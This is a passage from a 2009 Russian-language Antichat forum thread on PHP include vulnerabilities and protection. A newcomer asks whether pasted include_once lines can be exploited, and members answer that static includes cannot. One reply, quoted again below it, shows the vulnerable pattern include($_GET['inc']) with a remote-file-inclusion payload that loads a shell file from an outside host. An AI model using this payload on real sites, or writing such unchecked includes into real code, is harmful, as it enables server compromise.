ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
Перезагрузить страницу PHP-include и способы защиты
   
Ответ
Страница 3 из 3 < 1 2 3
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 11.04.2009, 06:28
Аватар для xMSAx
xMSAx
Новичок
Регистрация: 01.03.2009
Сообщений: 19
Провел на форуме:
62037

Репутация: -6
Smile
А тут можно провести инклуд?
Код:
<?php
include_once('папка/config.php');
include_once('папкаclass_usershop.php');
include_once('папкаclass_users.php');
include_once('папка/functions_usershop.php');
если например это nea.php как провести php inj?
 
Ответить с цитированием

  #22  
Старый 11.04.2009, 06:31
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию
Нет
Здесь инклюдимый файл нельзя заменить.
 
Ответить с цитированием

  #23  
Старый 11.04.2009, 09:24
Аватар для xMSAx
xMSAx
Новичок
Регистрация: 01.03.2009
Сообщений: 19
Провел на форуме:
62037

Репутация: -6
По умолчанию
а тут?
Код:
include_once('server_stats_generated.php');
Код:
$search = getSafeSearch($_GET['search']);
$script_name = "exchange.php";
$subpage = 'Exhange - Quotes';
 
Ответить с цитированием

  #24  
Старый 12.04.2009, 22:35
Аватар для 1NtR0
1NtR0
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
Провел на форуме:
1122391

Репутация: 209
По умолчанию
Цитата:
Сообщение от xMSAx  
а тут?
нельзя
 
Ответить с цитированием

  #25  
Старый 15.04.2009, 16:21
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию
Можно былобы,еслбы там стояло например:
PHP код:
include($_GET['inc']); 
Тогда передаем постом ?inc=http://xakip.ned/shell.txt
А там значение не статическое,а постоянное.
 
Ответить с цитированием

  #26  
Старый 15.04.2009, 17:37
Аватар для brasco2k
brasco2k
Постоянный
Регистрация: 23.11.2007
Сообщений: 342
Провел на форуме:
1215706

Репутация: 310
По умолчанию
Цитата:
Сообщение от m0Hze  
Можно былобы,еслбы там стояло например:
PHP код:
include($_GET['inc']); 
Тогда передаем постом ?inc=http://xakip.ned/shell.txt
А там значение не статическое,а постоянное.
статическое - это и есть постоянное
 
Ответить с цитированием
Ответ
Страница 3 из 3 < 1 2 3



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Local include && PHP baz1k Чужие Статьи 0 10.01.2008 04:50
Что такое Php? PAPA212 Болталка 13 28.12.2007 20:44
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ